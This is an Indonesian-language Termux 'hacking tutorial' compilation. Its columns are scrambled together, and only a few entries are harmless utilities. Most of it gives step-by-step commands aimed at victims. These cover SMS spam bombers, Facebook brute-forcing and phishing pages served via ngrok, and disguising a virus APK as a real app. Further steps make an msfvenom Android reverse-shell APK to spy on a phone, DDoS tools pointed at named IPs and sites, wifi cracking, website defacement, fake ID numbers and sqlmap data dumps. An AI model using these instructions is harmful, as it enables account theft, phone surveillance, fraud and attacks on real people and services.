Anda di halaman 1dari 30

• INDONESIAN TERMUX ASSOCIATION

• INDONESIAN DARK TERMUX ASSOCIATE


• TERMUX TUTORIAL
• INDONESIAN TERMUX USER
TUAN B4DUT,TUAN H4NTU
▪ SPAMMING
$ apt upgrade && apt update
$ apt install git
$ git clone https://github.com/mrmsdv/sdvspam.git
$ cd sdvspam
$ sh install.sh
$ sh sdv.sh • BRUTE FORCE FACEBOOK
Pilih nomer yang mana ajjh $ apt update && apt upgrade
Lalu $ apt install python2
Masukan nomer tanpa 0/62 $ apt install pytohon2-dev
Input bebas $ apt install wget
Jeda default $ pip2 install mechanize
$ apt install git
$ git clone https://github.com/Senitopeng/fbbrute
almu007
$ cd almu007
$ ls
$ python2 MBF.py
▪ CHATTING IRSSI DI TERMUX
• MENAMPILKAN INFORMASI SISTEM
$ pkg install irssi $ pkg install neofetch
$ irssi $ neofetch
$ /connect chat.freenode.net
$ /nick abcdef
Abcdef di ganti sesuai yang di inginkan
$ /join #INDONESIAN TERMUX ASSOCIATION
▪ PERKIRAAN CUACA
$pkg install curl • MEMUTAR MUSIK YOUTUBE DI TERMUX
$curl http://wttr.in/ (lokasi) $pkg install python
$ pip install mps_youtube
▪ BROWSING DI TERMUX
$ pip install youtube_dl
$ pkg install w3m $ apt install mpv
$ w3m www.google.com $ mpsyt
Linknya bsa diubah $ /judul lagu
Tinggal pilih lagu dengan mengetik nomornya
▪ MEMBUAT VIRUS DAN MENYAMARKANNYA
1. Download tool vbugnya dulu
2. Taruh file tool vbug di luar folder pada memori internal
3. Buka termux lalu $ cd /sdcard
4. $ unzip vbug.zip
5. $ cd vbug
6. $ python2 vbug.py
7. Enter
8. Ketik 10
9. Ketik E
10. Aplikasi virusnya sudah jadi
Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya
1. Buka APK Editor
2. Klik Select an Apk File
3. Pilih aplikasi virus tadi
4. Klik full edit
5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan
6. Lalu klik files
7. Klik res/drawable
8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan
Catatan: format logo harus .png
9. Ceklist logo yang kedua lalu replace
10. Pilih file logo yang mau dijadikan logo aplikasi agan
11. Back sampai home
Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita
12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai
bobot apliaksi agan
13. Klik build
14. Tunggu hingga selesai
15. Dan selesai
▪ LITESPAM
• BOT KOMENA FACEBOOK
$ pkg install git $pkg update && pkg upgrade
$ git clone https://github.com/4L13199/LITESPAM $pkg install git
$ cd LITESPAM $pkg install python2
$ sh LITESPAM.sh $pip2 install mechanize
▪ BOM SPAM $git clone https://github.com/Senitopeng/
Botkomena.git
apt upgrade && apt update $cd Botkomena
apt install git $python2 botkomena.py
git clone https://github.com/Amriez/gcospam
cd gcospam
sh install.sh
sh gco.sh • SPAMMING
Pilih nomer yang mana ajjh $apt update && apt upgrade
Lalu $apt install python2 php
Masukan nomer tanpa 0/62 $pip2 install requests
Input bebas $apt install nano
Jeda default $apt install git
$git clone https://github.com/Senitopeng/
SpamSms.git
$cd SpamSms
$python2 mantan.py
$ apt-get update
$ apt-get upgrade
$ pkg install python2
$ pkg install git
$ git clone https://github.com/evait-security/weeman.git
$ ls
$ cd weeman
$ ls
$ python2 weeman.py
$ show
$set url https://www.facebook.com
$set action_url https://www.facebook.com
$ show
buka new season (new tab) /lembar ke 2
$ ifconfig
jika slesai copy no addres yg tertera. jngn sampai salah karna ada 2 addres disitu.
jika tdk tau yg mna tanya.
stelah copy no adres.
buka lembar pertama lagi tulis
$ run
kasih adres tdi ke target.
contoh 125.25.175.88:8080 ingt hrus ksh port > :8080
jika sudah dibuka dngn dia. saat dia login nnti.
email. pass. tertera. serta data" akun target....
$pkg install vim
$pkg install ruby
$gem install lolcat
$pkg install cowsay
$pkg install toilet
$pkg install neofetch
$pkg install figlet
$vim /data/data/com.termux/files/usr/etc/profile
Tekan huruf "i" untuk ngedit teks
Copy script dibawah ini lalu paste di profil
Salin script perintah :
clear
echo
echo
cowsay -f eyes SELAMAT DATANG NAMAMU | lolcat
echo
toilet -f standard -F gay "NAMAMU"
echo
neofetch
echo
-e '\033[01;32m'
date
echo
-e '\033[01;32m'
bisa diganti dengan nama Anda
Munculkan ESC dengan cara tekan Vol up + Q secara bersamaan
lalu simpan scripts di atas tadi yang sudah di edit dengan cara tekan ESC lalu tulis :wq
lalu Enter jika sudah, tulis Exit nanti akan otomatis Termux akan Close sendiri
▪ INSTALL STRIKER
INSTALL TOOLS MR.C4K1L
$ apt update apt update && apt upgrade
pkg install git
$ apt upgrade git clone https://github.com/mrcakil/Mrcakil.git
cd Mrcakil
$ pkg install git chmod +x tools
./tools
$ pkg install python2

$ git clone https://github.com/UltimateHackers/Striker

$ cd Striker • INSTALL SANTET-ONLINE


$pkg update
$ pip2 install -r requirements.txt $pkg upgrade
$pkg install python2
$ python2 striker.py $pkg install git
$git clone https://github.com/Gameye98/santet-online
$ls
$cd santet-online
$ls
$python2 santet.py
▪ INSTALL METASPLOIT
$ pkg update && pkg upgrade • INSTALL OSIF
$ pkg install curl $apt update && apt upgrade
$ pkg install python $apt install python2
$ pkg install python2 $pip2 install requests mechanize
$ curl - $apt install git
LO https://raw.githubusercontent.com/Te $git clone $https://github.com/CiKu370/OSIF.git
chzindia/Metasploit_For_Termux/master $cd OSIF
/metasploitTechzindia.sh $pip2 install -r requirements.txt
$ ls $python2 osif.py
$ chmod 777 metasploitTechzindia.sh $token
$ ./metasploitTechzindia.sh — ( $isi username dan pass fb anda
Tunggu 5 – 10 menit ) $help
$ ls $bot
$ cd metasploit-framework pilih bot terserah anda
$ ./msfconsole
▪ SCANNER INURLBR
$ apt update • INSTALL SOCIAL FISH
$ apt update
$ apt upgrade
$ apt upgrade
$ pkg install php
$ pkg install git
$ pkg install git
$ pkg install python2
$ git clone
https://github.com/googleinurl/SCAN $ pkg install php
NER-INURLBR.git
$ git clone https://github.com/UndeadSec/SocialFish
$ cd SCANNER-INURLBR
$ cd SocialFish
$ php inurlbr.php
$ pip install -r requirements.txt

$ python2 SocialFish.py
▪ BOBOL WIFI DENGAN AKSES ROOT
Ini cara mudah disederhanakan.
1) gunakan dulu jaringan hp + buka wifi, cari tempat yang wifi nya cepat + masih di
password.
2) buka termux.
3) apt update + apt upgrade
4) pkg install git
5) git clone https://github.com/esc0rtd3w/wifi-hacker
6) cd wifi-hacker/
7) chmod +x wifi-hacker.sh
8) ./wifi-hacker.sh
9) pilih y tunggu 10 detik lalu pilih 2
10) buka menu wifi di hp. Tutup terus buka lagi. Otomatis terhubung.
11) bobol wifi, bisa connect tapi kita tetap gak tau pw. Yang penting bisa wifian gratis.
▪ MEMBUAT SCRIPT DEFACE
$ apt update
$ apt upgrade
$ apt install python2
$ apt install git
$ git clone https://github.com/Ubaii/script-deface-creator
$ ls
$ cd script-deface-creator
$ ls
$ chmod +x create.py
$ ls
$ python2 create.py
~Selanjutnya, cara pembuatannya:
- Judul title:(Nama Team/Bebas)
- Hacked by:(Nama Samaran Kalian)
- Link gambar (tengah):(link nya bisa ngambil di google)
- Link gambar (background):(link nya ngambil di google)
- Pesan:(terserah kalian mau nulis apa aja bebas)
- Warna Text: (terserah warna kalian,jangan lupa pake bhs.inggris)
~Setelah ikuti tutorial diatas,sekarang kita tinggal meng save/menyimpan data
tersebut:$ls
$mv -f script.html /sdcard
▪ ===Mengetahui merek hp orang lain dengan link===
Pastikan kalian udah install ngrok dan metasploit
*Buka ngrok :*
$ ./ngrok http 6969 (bebas 4 angka)
*Buka metasploit/halaman baru*
$ msfconsole
$ use exploit/android/browser/stagefright_mp4_tx3g_64bit.rb
$ set lhost 127.0.0.1
$ set srvhost 127.0.0.1
$ set lport 6969
$ set srvport 6969
$ set uripath hackinstagram
$ run
Kembali ke ngrok dan salin linknya dan tambah uripathnya
Contoh https://blablabla.ngrok.io/hackinstagram
▪ INSTALL CREWBOT
• GENERATE NIK DAN KK UNTUK REGISTRASI
$apt update $ git clone https://github.com/zerosvn/ktpkkgenerate
$apt upgrade $ ls
$pkg install $ cd ktpkkgenerate
$git clone $ ls
https://github.com/Xeit666h05t/CrewBot $ php zerosvn.php
$ls
$cd CrewBot
$python2 CrewBot.pyc INSTALL A-RAT
$ apt update && apt upgrade
$ pkg install git
$ pkg install python2
• INSTALL LAZYMUX $ git clone https://github.com/Xi4u7/A-Rat.git
$ apt update && apt upgrade $ cd A-Rat
$ apt install git $ python2 A-Rat.py
$ apt install python
$ apt install python2
$ git clone https://github.com/Gameye98/Lazymux.git
$ cd Lazymux
$ python2 lazymux.py
▪ INSTALL HAMMER • INSTALL LITE DDOS
$pkg install python2
$ apt update
$pkg install git
$ apt upgrade
$git clone https://github.com/4L13199/LITEDDOS
$ pkg install python -Y $cd LITEDDOS/
$ pkg install git -Y $python2 LITEDDOS.py
$ git clone $python2 LITEDDOS.py 147.237.76.155 80 100|lolcat
https://github.com/cyweb/ham
mer
$ ls • INSTALL RECONDOG
$ cd hammer apt update
$ python hammer.py apt install python python2
$ python hammer.py -s (ip apt install git
addres) -p 80 -t 135 git clone
https://github.com/UltimateHackers/ReconDog
cd ReconDog
chmod +x dog.py
Python2 dog.py
▪ INSTALL METASPLOIT
1 - pkg install curl

2 - curl -LO
https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.s
h

3 - chmod +x metasploit.sh

4 - sh metasploit.sh

5 - cd metasploit-framework/

6 - bundle install

7 - bundle install Nokogiri

8 - ./msfconsole
▪ MENYADAP HP ORANG LAIN DENGAN METASPLOIT
$ ls
$ cd metasploit-framework
$ ls
$ ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=10.32.140.70
LPORT=4444 R> /sdcard/HackTools.APK

TUNGGU PROSES PEMBUATAN APK SELESAI

$cd metasploit-framework-4.16.16
$ ./msfconsole (TUNGGU PROSES PENGHIDUPAN METASPLOIT)
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set lhost 10.32.140.70
$ set lport 4444
$ exploit
Share Apknya
Klo apk keinstall Trus Di Buka Maka Bisa kita Sadap
▪ INSTALL TOOLS • INSTALLNTOOLS DIEJOUBU
BAJINGANV6 $apt upgrade && apt update
$apt install php
$ pkg install git
$apt install git
$ git clone Kalo udah selesai langsung masukan git nya dengan
https://github.com/Darknes perintah
sCyberTeam/BAJINGANv6 $git clone https://github.com/alintamvanz/diejoubu
$ ls
$cd diejoubu
$ cd BAJINGANv6
$cd v1.2
$ sh BAJINGAN.sh $php diejoubu.php
Username: BAJINGAN
Password: Gans • INSTALL TORSHAMMER
• INSTALL XERXES $ pkg update
$ apt install git $ pkg install git
$ apt install clang $ Pkg install tor
$ git clone https://github.com/zanyarjamal/xerxes $ pkg install python2
$ ls $ git clone
$ cd xerxes https://github.com/dotfighter/torshammer.git
$ ls $ ls
$ clang xerxes.c -o xerxes $ cd torshammer
$ ls $ python2 torshammer.py -T -t seword.com (web yang
$ ./xerxes (nama website) 80 kalian attack)

▪ INSTALL KATOOLIN INSTALL TOOL-X
$ pkg update $pkg update
$ pkg upgrade $apt install git python python2
$git clone https://github.com/Techzindia/Tool-X
$ pkg install git
$ls
$ pkg install python2
$cd Tool-X
$ pkg install nano
$ pkg install gnupg $ls
$ git clone $chmod +x install.aex
$clear
https://github.com/LionSec/kat
$./install.aex
oolin.git
$y
$ ls $Tool-X
$ cd katoolin $3
$00
$ ls
$1
$ python2 katoolin.py
$ nano katoolin.py
▪ INSTALL D-TECT • MULTI BRUTEFORCE FACEBOOK
$ pkg update && upgrade
$ apt install git
$ pkg update && upgrade
$ apt install python2
$ pkg install python2
$ git clone $ pkg install git
https://github.com/shawark $ git clone https://github.com/pirmansx/mbf
hanethicalhacker/D-TECT $ cd mbf
$ ls
$ python2 MBF.py
$ cd D-TECH
$ chmod +x d-tect.py
$ python2 d-tect.py
• MELACAK IP DENGAN DETAIL
• TOOLS Mr.Rv1.1 git clone https://github.com/maldevel/IPGeolocation
$apt update && apt upgrade cd IPGeolocation
$pkg install git chmod +x ipgeolocation.py
$pkg install gem pip install -r requirements.txt
$pkg install figlet python ipgeolocation.py -m
$gem install lolcat python ipgeolocation.py -t IP yang ingin dilacak
$git clone https://github.com/Mr-R225/Mr.Rv1.1
$cd Mr.Rv1.1
$sh Mr.Rv1.1.sh
▪ INSTALL UBUNTU • TOOLS RED-HAWK
$ apt update
$ apt update
$ apt install git
$ apt install git
$ git clone
$ apt install wget https://github.com/Tuhinshubhra/RED_
$ apt install proot HAWK
$ git clone $ cd RED_HAWK
https://github.com/Neo-
$ chmod +x rhawk.php
Oli/termux-ubu…
$ apt install php
$ cd termux-ubuntu $ ls • INSTALL WEBDAV
$ chmod +x ubuntu.sh $ php rhawk.php $ apt update && upgrade
$ ./ubuntu.sh $ apt install python2
$ ./start.sh $ pip2 install urllib3 chardet certifi idna requests
$ apt install openssl curl
$ pkg install libcurl
$ ln -s /sdcard
$ cd sdcard
$ mkdir webdav
$ cd webdav
$python2 webdav.py
1. INSTALL ADMIN FINDER
• INSTALL KALI NETHUNTER
$ apt update && apt upgrade $ apt update
$ pkg install python2 $ apt install git
$ pkg install git $ git clone https://github.com/Hax4us/Nethunter-In-
$ git clone Termux.git
https://github.com/AdheBolo/AdminFinder $ cd Nethunter
*Menjalankan* $ Is
$ ls $ chmod +x kalinethunter
$ cd AdminFinder $ ./kalinethunter
$ chmod 777 AdminFinder.py $ ./startkali.sh
$ python2 AdminFinder.py
▪ SPAMMING • INSTALL HAKKU
$ git clone apt install python
https://github.com/Cvar1984/ apt install git
LiteOTP mkdir vasu
$ ls git clone
$ cd LiteOTP https://github.com/4shadoww/hakkuframework
$ chmod 777 lite.php cd hakkuframework
$php lite.php chmod +x hakku
$ php lite.php (input
no.korban) python hakku
show modules
use whois
show options
set target examplesite.com
run
• LOCALIZER IP
▪ INSTALL SQLMAP apt install python git
apt update git clone
apt install python https://github.com/maldevel/IPGeoLocation.git
apt install python2 cd IPGeoLocation
apt install git chmod +x ipgeoLocation.py
git clone pip install -r requirements.txt
https://github.com/sqlmapproject/sqlmap python ipgeolocation.py -m
cd sqlmap python ipgeolocation.py -t http://www.google.com
Python2 sqlmap.py
______ • HASH BUSTER
Exemple apt update
Python2 sqlmap.py -u website –dbs apt upgrade
-D acuart –tables apt install python2
-D acuart -T users –columns apt install git
-D acuart -T users -C name,email,phone -dump git clone https://github.com/UltimateHackers/Hash
Buster
cd Hash-Buster
python2 hash.py
▪ TOOLS ROUTERSPLOIT
apt install git
apt install python2
pip2 install requests
git clone https://github.com/reverse-shell/routersploit.git
cd routersploit
pip install -r requirements.txt
termux-fix-shebang rsf.py
Cara pake • HUNNER FRAMEWORK
cd routersploit
./ rsf.py $ apt update
use scanners/autopwn $ apt install python
show options $ apt install git -y
set target 192.168.1.1 $ git clone https://github.com/b3-v3r/Hunner
set port 8080 $ cd Hunner
set threads 10 $ chmod 777 hunner.py
masukkan exploitsnya
set target 192.168.1.1 $ python hunner.py
-check
-run
▪ Pastikan ada file PhisingGame, kalau belum ada nya
https://www118.zippyshare.com/v/JSZAdFiS/file.html
$ apt update && apt upgrade
$ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
$ unzip ngrok-stable-linux-arm.zip
$ rm -rf ngrok-stable-linux-arm.zip
daftar akun ngrok dolo https://dashboard.ngrok.com/user/signup
dah tuh login https://dashboard.ngrok.com/user/login
kalah sudah selesai pergi ke Termux
$ ./ngrok -h
command -h untuk minta bantuan ~makan~
$ ./ngrok http 8080
ke new session
pindahkan file PhisingGame
$ cd /sdcard
$ cp -rf PhisingGame $HOME
$ cd
$ cd PhisingGame
$ python2 phising.py
Lalu salin link yang ada disitu
tinggal pilih
info lebih lanjut
$ cat Petunjuk.txt
• TOOLS WEBPWN3R
▪ BLACK HYDRA
apt update && apt upgrade
$ apt update && apt upgrade apt install git
$ apt install git git clone https://github.com/zigoo0/webpwn3r
$ git clone ls
https://github.com/Gameye98/Black- cd webpwn3r
Hydra
ls
$ cd b-hydra
$ mv blackhydra.py main.py chmod +x scan.py
$ chmod +x main.py apt install python2 -y
$ python2 main.py ls
• SPAMMING pyhton2 scan.py
$ apt upgrade && apt update
$ apt install git
$ git clone https://github.com/mrmsdv/sdvspam.git
$ cd sdvspam
$ sh install.sh
$ sh sdv.sh
Pilih nomer yang mana ajjh
Lalu
Masukan nomer tanpa 0/62
Input bebas
Jeda default

Anda mungkin juga menyukai